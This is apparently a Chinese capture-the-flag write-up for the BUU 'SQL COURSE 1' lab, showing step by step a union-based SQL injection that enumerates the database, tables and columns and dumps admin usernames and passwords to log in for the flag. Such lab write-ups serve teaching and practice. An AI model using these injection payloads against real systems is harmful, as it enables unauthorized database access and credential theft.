BUU SQL COURSE 1

发现有登录框,爆破半天也爆破不出来,只能从别的地方下手了

F12一下

发现了一个传参

进去发现id可以传参,sql注入一下试试

前三个都有回显,当id=4的时候页面没有回显了,正好验证 了页面 有三个新闻

当order by =3的时候又没有回显了,这时可以判断有2个字段

当我们查询显错位的时候,发现页面没有变化,考虑到是不是过滤了什么

?id=-1 union select 1,2

于是在传参点把1改为-1 就可以看到页面有回显了

?id=-1 union select 1,database() 查库名

查表名

?id=-1 union select 1,table_name from information_schema.tables where table_schema='news'

查字段 ?id=-1 union select 1,column_name from information_schema.columns where table_name='admin'

这不是我们要的字段,我们要找的是username 和password

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit0,1

?id=-1 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1

查数据

?id=-1 union select 1,username from admin limit 0,1

?id=-1 union select 1,password from admin limit 0,1

拿着账号密码去登录

登录成功 flag就出来了

相关推荐
要开心吖ZSH10 分钟前
MVCC 进阶:快照读 vs 当前读、幻读与 Next-Key Lock
java·数据库·sql·mysql·mvcc
水木流年追梦16 分钟前
agent面试必备31- AI Agent 核心进阶:工具路由(Tool Routing)
数据库·人工智能·oracle·面试·职场和发展·embedding
xcLeigh1 小时前
KES运维自动化与脚本体系实战
运维·数据库·自动化·脚本·数据迁移·kes
大气的小蜜蜂1 小时前
领域层的服务
java·前端·数据库
翔云1234561 小时前
简单概括主库上 Executed_Gtid_Set 是什么时候更新的
数据库·mysql
火星校尉1 小时前
一场数据基建与消费场景的跨界实验
java·前端·数据库·python·php
平安的平安1 小时前
从“云端排队“到“边缘上岗“:DolphinDB 云边协同如何重塑工业现场的实时智能
数据库
懒鸟一枚2 小时前
为什么 useradd -rs /bin/false service 创建的用户无法用 su 切换?
linux·服务器·数据库
爱喝热水的呀哈喽2 小时前
hypermesh两个网格参数解析
服务器·数据库·mysql
IvorySQL2 小时前
PG 技术日报|2026-07-03
数据库·postgresql·开源